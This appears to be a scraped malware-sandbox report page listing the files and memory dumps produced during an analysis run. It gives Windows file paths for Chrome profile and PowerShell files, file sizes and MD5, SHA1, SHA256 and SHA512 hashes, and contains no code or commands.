0a9195ea8582cbb89293e6f63c71536d2914312faa9b824039e36bed67b18ce40afcf2969492f729d81a1bdca7fd8f98545e249b94288f3c989a66f27e16b986

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
9a87e4dda671cba6b128a9b94ac26ead

SHA1
a72a9a7736b23bbffb43591b86dcdd6b3b2f113f

SHA256
57b290499fd125a5467db15603710abfe38c9801e2f4323730c25969721a6a1f

SHA512
7814169105124b53877551d8352d8e6e7a3bfcea302e17bd4442d1acdb3376f38d18ad4db93217db9a4fded216a841170b6e422469314c783b7bb19a373eec2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
e106269fab5e09c6b53c21934268a118

SHA1
46b42a0fb5fdc5dd2bc3f6c4c165f8ea94a576ed

SHA256
f9d8084d7c967e85e9ac790ba59084f3f4b6e3a2997642bc0b79b51dcdf1faaf

SHA512
eb2ec692be67f2319741ed3f2194399b629af900732848ce11dcd1e7037a369086e0356ef22598c132e53ca7f4f39a31f8a1bfcc0f8d06fcc3d72d9b3e3895d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe585d2e.TMP

Filesize
48B

MD5
7304c920d82f6d9ac1105426c8d35c19

SHA1
eb24572dcac3ca7307481be29a8e274359aedbe8

SHA256
6f0af387bb0d4bd9cb9c333e630def747424219c74e3a57a442d30b483a4f7e4

SHA512
7c0de1aaf451cc6281a5dc4c63936f26efb69604448e46f291c50f06dbbdb9da4edce1318dbd7ad65dc57797fdbc6b14311d831b111538b2a384a40acd02c80a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
203KB

MD5
b651ece8246c30f3235466a7b8d5ceea

SHA1
7b013f9e9b381740acd4b868a93d3abddbe0ada5

SHA256
7d63d28bff9b265546f47327f7e680c1e142deefd594b788ee314040e5d0902a

SHA512
3e9e3b4ada4ab2d5465603b4cb40589dd716add654ee60590477d05ff3c9636e562b0c1a874175a333b128364b1704fc6f9ce40a3a6d239a3214333a5d905c75

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
203KB

MD5
fe3f7b2069ef94616a7c37a66f5e9961

SHA1
395a38f33400bd5b5bba9a82a3b6c1faf8be3eaa

SHA256
45b9b1154656acff1bc1972d69e2bdeaf39708ded93c6a40b49e7a7e0704ae84

SHA512
843e9e7298f6c2c144b111ba3786cde8d6e43beff5dcdd026dfb7225822b5f7cf0e9d730fd994370239ba6e1c7e56d76c8fcad74ae6882a55922e1fc6df02e0b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1867ca0f3ba7d8b0ab3169eb1b17b2e8

SHA1
40c51c3b00d3d229c2a56011b4a02fdcbd026187

SHA256
ab51c217e9153dbcdf109ea319478d39cfbb825de7d60e565118d6168212baa8

SHA512
aba4abcb7a88b43b1921c2fe58d3c1e2125c411d54f845b22b9db026fd32784d2e67d08bb7fe52782d6cf803a22721a7b4ec0be0adc8317a9c1db11d40659b71

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
280a2e7c7a875c088f7358d92649b515

SHA1
caf40a391db037c72ad0392ebd9d4c6b9b25e5ab

SHA256
783b647c3858644c2ea21211d0bfcd76ff6984e7edac42fd5cec20fb01b92113

SHA512
d6c32e5ea189ccba1893bb2c5c0b8cd59aa0aa5060145bb5b03e947e1bf795e2326d527e8f651eb332c50e676e231f3cebdd7e761911b22d9673614db7d97f9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a3e7234319490c2f898752eea949d031

SHA1
b90f09527baf4159aacda981ba143c6baf48bf75

SHA256
2c35c568da3780c9ca041fa7e8058ee71e4953c9a0b5151c2dd0eecbdf50ebc1

SHA512
588fcf39ffaf0eec0e0d2ed6dd2c430a10c00e1e8ca0ed1c37f3cc525e8dda6126619b6762890061e7fbc0da7c72d945238b5bc5048a704486b5621eed6fc6a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
721a0456f5d246ebf1c53dd23ef4c6a4

SHA1
94a2ac04c982086c6c5eb0628297a9b9835dbde3

SHA256
8bde17caa6e4632d1fbaf0f8fcfe87a58dc4d3764ee2709a0330c113414e970e

SHA512
1dc90e5b982fb4150d903060f1bbede8a8f8984ccdb2f18cf033ec3f68fb61d5dd852ebc45e06f66734589173ae1f357167fc97a9ab1d8416557f400468b9594

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yafhaoak.z5k.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4260-151-0x000001B9FDB20000-0x000001B9FDB30000-memory.dmp

Filesize
64KB

Download
memory/4260-193-0x00007FFFFD670000-0x00007FFFFE131000-memory.dmp

Filesize
10.8MB

Download
memory/4260-141-0x00007FFFFD670000-0x00007FFFFE131000-memory.dmp

Filesize
10.8MB

Download
memory/4260-143-0x000001B9FDB20000-0x000001B9FDB30000-memory.dmp

Filesize
64KB

Download
memory/4260-175-0x000001B9FDB20000-0x000001B9FDB30000-memory.dmp

Filesize
64KB

Download
memory/4340-11-0x00007FFFFD670000-0x00007FFFFE131000-memory.dmp

Filesize
10.8MB

Download
memory/4340-12-0x0000029961770000-0x0000029961780000-memory.dmp

Filesize
64KB

Download
memory/4340-13-0x0000029961770000-0x0000029961780000-memory.dmp

Filesize
64KB

Download
memory/4340-22-0x0000029962410000-0x0000029962BB6000-memory.dmp

Filesize
7.6MB

Download
memory/4340-124-0x00007FFFFD670000-0x00007FFFFE131000-memory.dmp

Filesize
10.8MB

Download
memory/4340-1-0x0000029961730000-0x0000029961752000-memory.dmp

Filesize
136KB

Download
memory/4760-196-0x000001EF01CF0000-0x000001EF01D00000-memory.dmp

Filesize
64KB

Download
memory/4760-195-0x000001EF01CF0000-0x000001EF01D00000-memory.dmp

Filesize
64KB

Download
memory/4760-194-0x00007FFFFD670000-0x00007FFFFE131000-memory.dmp

Filesize
10.8MB

Download
memory/4760-207-0x000001EF01CF0000-0x000001EF01D00000-memory.dmp

Filesize
64KB

Download
memory/4760-271-0x00007FFFFD670000-0x00007FFFFE131000-memory.dmp

Filesize
10.8MB

Download
memory/5140-273-0x000001BE56E20000-0x000001BE56E30000-memory.dmp

Filesize
64KB

Download
memory/5140-272-0x00007FFFFD670000-0x00007FFFFE131000-memory.dmp

Filesize
10.8MB

Download
memory/5140-291-0x00007FFFFD670000-0x00007FFFFE131000-memory.dmp

Filesize
10.8MB

Download
memory/5508-321-0x00007FFFFD670000-0x00007FFFFE131000-memory.dmp

Filesize
10.8MB

Download
memory/5508-319-0x000001E6E4D00000-0x000001E6E4D10000-memory.dmp

Filesize
64KB

Download
memory/5508-313-0x000001E6E4D00000-0x000001E6E4D10000-memory.dmp

Filesize
64KB

Download
memory/5508-312-0x000001E6E4D00000-0x000001E6E4D10000-memory.dmp

Filesize
64KB

Download
memory/5508-311-0x00007FFFFD670000-0x00007FFFFE131000-memory.dmp

Filesize
10.8MB

Download